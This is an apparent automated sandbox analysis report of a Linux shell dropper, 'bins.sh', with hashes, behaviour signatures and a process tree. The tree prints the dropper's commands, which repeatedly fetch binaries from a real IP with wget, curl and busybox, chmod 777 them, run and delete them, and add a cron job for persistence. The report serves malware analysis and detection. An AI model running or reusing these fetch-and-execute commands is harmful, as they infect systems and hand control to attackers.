Analysis

  • max time kernel
    15s
  • max time network
    41s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    27-10-2024 03:07

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    f1355bcf61566b8e884726b7afa77f2d

  • SHA1

    ad708c314476785e25d5f6f0ae6f3197e3d9f904

  • SHA256

    e329bfb94581ca68903cc299500255516655f8e868f49a0ff27e47e9f55ad6aa

  • SHA512

    f0d0c07f3e32c570f67cb4e05b10b8d02429b384779c6d0dcd5963022b236efd248c606fe6e1e43e974fb986804a039df540bbf1a38198dfc4682c296198178e

  • SSDEEP

    96:Z00fw0gjGqoiYoTProP3uZjsH4wDyuv/zQddPKQXhwXhUXh+WXhyXhCXhnsGK/zj:8+cIl/zQddPK0UgHqae/zQddrUgHqaVM

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 16 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:650
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:652
        • /usr/bin/wget
          wget http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          2⤵
          • Writes file to tmp directory
          PID:654
        • /usr/bin/curl
          curl -O http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:674
        • /bin/busybox
          /bin/busybox wget http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          2⤵
          • Writes file to tmp directory
          PID:680
        • /bin/chmod
          chmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          2⤵
          • File and Directory Permissions Modification
          PID:681
        • /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          2⤵
          • Executes dropped EXE
          PID:682
        • /bin/rm
          rm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
          2⤵
            PID:684
          • /usr/bin/wget
            wget http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            2⤵
            • Writes file to tmp directory
            PID:685
          • /usr/bin/curl
            curl -O http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:688
          • /bin/busybox
            /bin/busybox wget http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            2⤵
            • Writes file to tmp directory
            PID:698
          • /bin/chmod
            chmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            2⤵
            • File and Directory Permissions Modification
            PID:702
          • /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            ./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            2⤵
            • Executes dropped EXE
            PID:704
          • /bin/rm
            rm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
            2⤵
              PID:706
            • /usr/bin/wget
              wget http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
              2⤵
              • Writes file to tmp directory
              PID:708
            • /usr/bin/curl
              curl -O http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:718
            • /bin/busybox
              /bin/busybox wget http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
              2⤵
              • Writes file to tmp directory
              PID:734
            • /bin/chmod
              chmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v
              2⤵
              • File and Directory Permissions Modification
              PID:740
            • /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
              ./ekoIDag2IrendezgvRAX8H4MvHggSiH31v
              2⤵
              • Executes dropped EXE
              • Renames itself
              • Reads runtime system information
              PID:741
              • /bin/sh
                sh -c "crontab -l"
                3⤵
                  PID:743
                  • /usr/bin/crontab
                    crontab -l
                    4⤵
                    • Reads runtime system information
                    PID:744
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:746
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      • Reads runtime system information
                      PID:747
                • /bin/rm
                  rm ekoIDag2IrendezgvRAX8H4MvHggSiH31v
                  2⤵
                    PID:750
                  • /usr/bin/wget
                    wget http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                    2⤵
                      PID:754
                    • /usr/bin/curl
                      curl -O http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                      2⤵
                      • Checks CPU configuration
                      PID:755
                    • /bin/busybox
                      /bin/busybox wget http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                      2⤵
                      • Writes file to tmp directory
                      PID:756
                    • /bin/chmod
                      chmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                      2⤵
                      • File and Directory Permissions Modification
                      PID:765
                    • /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                      ./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                      2⤵
                      • Executes dropped EXE
                      PID:766
                    • /bin/rm
                      rm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
                      2⤵
                        PID:768
                      • /usr/bin/wget
                        wget http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                        2⤵
                          PID:769
                        • /usr/bin/curl
                          curl -O http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          PID:773
                        • /bin/busybox
                          /bin/busybox wget http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                          2⤵
                          • Writes file to tmp directory
                          PID:776
                        • /bin/chmod
                          chmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                          2⤵
                          • File and Directory Permissions Modification
                          PID:784
                        • /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                          ./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                          2⤵
                          • Executes dropped EXE
                          PID:786
                        • /bin/rm
                          rm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
                          2⤵
                            PID:787
                          • /usr/bin/wget
                            wget http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                            2⤵
                              PID:789
                            • /usr/bin/curl
                              curl -O http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                              2⤵
                              • Checks CPU configuration
                              • Reads runtime system information
                              PID:790
                            • /bin/busybox
                              /bin/busybox wget http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                              2⤵
                              • Writes file to tmp directory
                              PID:793
                            • /bin/chmod
                              chmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                              2⤵
                              • File and Directory Permissions Modification
                              PID:800
                            • /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                              ./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                              2⤵
                              • Executes dropped EXE
                              PID:801
                            • /bin/rm
                              rm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
                              2⤵
                                PID:802
                              • /usr/bin/wget
                                wget http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                2⤵
                                  PID:803
                                • /usr/bin/curl
                                  curl -O http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                  2⤵
                                  • Checks CPU configuration
                                  • Reads runtime system information
                                  PID:804
                                • /bin/busybox
                                  /bin/busybox wget http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:805
                                • /bin/chmod
                                  chmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:806
                                • /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                  ./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                  2⤵
                                  • Executes dropped EXE
                                  PID:807
                                • /bin/rm
                                  rm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
                                  2⤵
                                    PID:809
                                  • /usr/bin/wget
                                    wget http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                    2⤵
                                      PID:810
                                    • /usr/bin/curl
                                      curl -O http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                      2⤵
                                      • Checks CPU configuration
                                      • Reads runtime system information
                                      PID:811
                                    • /bin/busybox
                                      /bin/busybox wget http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                      2⤵
                                      • Writes file to tmp directory
                                      PID:812
                                    • /bin/chmod
                                      chmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:813
                                    • /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                      ./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                      2⤵
                                      • Executes dropped EXE
                                      PID:814
                                    • /bin/rm
                                      rm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
                                      2⤵
                                        PID:816
                                      • /usr/bin/wget
                                        wget http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                        2⤵
                                          PID:817
                                        • /usr/bin/curl
                                          curl -O http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                          2⤵
                                          • Checks CPU configuration
                                          • Reads runtime system information
                                          PID:818
                                        • /bin/busybox
                                          /bin/busybox wget http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:819
                                        • /bin/chmod
                                          chmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:820
                                        • /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                          ./OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                          2⤵
                                          • Executes dropped EXE
                                          PID:821
                                        • /bin/rm
                                          rm OESnKxfsceE83uK3qyhjMDf2qeykBknq50
                                          2⤵
                                            PID:823
                                          • /usr/bin/wget
                                            wget http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                            2⤵
                                              PID:824
                                            • /usr/bin/curl
                                              curl -O http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                              2⤵
                                              • Checks CPU configuration
                                              • Reads runtime system information
                                              PID:825
                                            • /bin/busybox
                                              /bin/busybox wget http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:826
                                            • /bin/chmod
                                              chmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:827
                                            • /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                              ./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                              2⤵
                                              • Executes dropped EXE
                                              PID:828
                                            • /bin/rm
                                              rm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
                                              2⤵
                                                PID:829
                                              • /usr/bin/wget
                                                wget http://87.120.84.230/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead
                                                2⤵
                                                  PID:830

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5

                                                Filesize

                                                158KB

                                                MD5

                                                d8e96e2fdd3c610ec19128e18de5abde

                                                SHA1

                                                10cf691ae9779bfeca8b67e75721d0a6f275e4f9

                                                SHA256

                                                f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b

                                                SHA512

                                                979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

                                              • /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr

                                                Filesize

                                                100KB

                                                MD5

                                                3b78bb645b81d600c30713d416f666be

                                                SHA1

                                                23796112f2cce2afb2217498b5ecf2801ab550f2

                                                SHA256

                                                d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

                                                SHA512

                                                9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

                                              • /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50

                                                Filesize

                                                95KB

                                                MD5

                                                c20c610e14b8e59f5f8258a55fe7f27d

                                                SHA1

                                                e59a0b83d9882f2770f052a213cad25b0cbd53fc

                                                SHA256

                                                adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b

                                                SHA512

                                                dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

                                              • /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M

                                                Filesize

                                                93KB

                                                MD5

                                                27a1a1941f224eff6a4babf2495e3692

                                                SHA1

                                                86fae66a698f6280353e470ffadfb64441b03e83

                                                SHA256

                                                ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179

                                                SHA512

                                                cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

                                              • /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ

                                                Filesize

                                                84KB

                                                MD5

                                                64ece99ca4ab1c1405f5a3335d64a960

                                                SHA1

                                                b7395f2320a5bdadb78943b268708965cdbd1d74

                                                SHA256

                                                aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

                                                SHA512

                                                bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

                                              • /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v

                                                Filesize

                                                108KB

                                                MD5

                                                c97a9c55ddb153e8bfce38f201d2cffb

                                                SHA1

                                                3970452f27327f98c2e3fdcabf0390067b48bd62

                                                SHA256

                                                138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c

                                                SHA512

                                                1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

                                              • /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub

                                                Filesize

                                                101KB

                                                MD5

                                                8d0f8d45165dc1f3ba334ce75be39621

                                                SHA1

                                                1d5baece9d5af3885276735c3c20d28e161e00ff

                                                SHA256

                                                17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791

                                                SHA512

                                                a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

                                              • /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1

                                                Filesize

                                                80KB

                                                MD5

                                                22c527269cbd9b42f4ade79f52757efb

                                                SHA1

                                                c2456188a49af93b0d07af2a7cc1346d5be510bd

                                                SHA256

                                                100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97

                                                SHA512

                                                7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

                                              • /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT

                                                Filesize

                                                122KB

                                                MD5

                                                aadb8cc4b6eac7fce760c09262693884

                                                SHA1

                                                b55178ff3605f4bbfc9286d4c8ac445673232217

                                                SHA256

                                                b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843

                                                SHA512

                                                5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

                                              • /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6

                                                Filesize

                                                101KB

                                                MD5

                                                a7e686eb3f74b104a5520f08cfd54eb5

                                                SHA1

                                                58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

                                                SHA256

                                                617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

                                                SHA512

                                                2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

                                              • /var/spool/cron/crontabs/tmp.mNXacx

                                                Filesize

                                                210B

                                                MD5

                                                dd56b78740f7e5ffa75a2b8fa4ae9599

                                                SHA1

                                                10c482173e7e30d5d8f377afc44c9602c15e6305

                                                SHA256

                                                ca5c424e6e9b8ec343b692fa2bbd94ebcdb362eaa6d1cff58c51b9deeecca593

                                                SHA512

                                                b08236f78efa358c55dd5475ededd55199f48158cd100e3f9b81250b0ba3d673744d2a9de3871650d11106f540a2149c3a84cfed181bb456f629de673577220c